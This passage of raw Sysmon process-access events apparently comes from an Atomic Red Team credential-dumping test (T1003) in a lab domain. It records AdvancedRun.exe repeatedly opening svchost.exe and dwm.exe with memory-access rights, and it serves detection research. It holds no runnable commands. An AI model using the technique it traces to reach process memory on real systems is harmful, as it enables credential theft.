in\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003952077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003952076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomi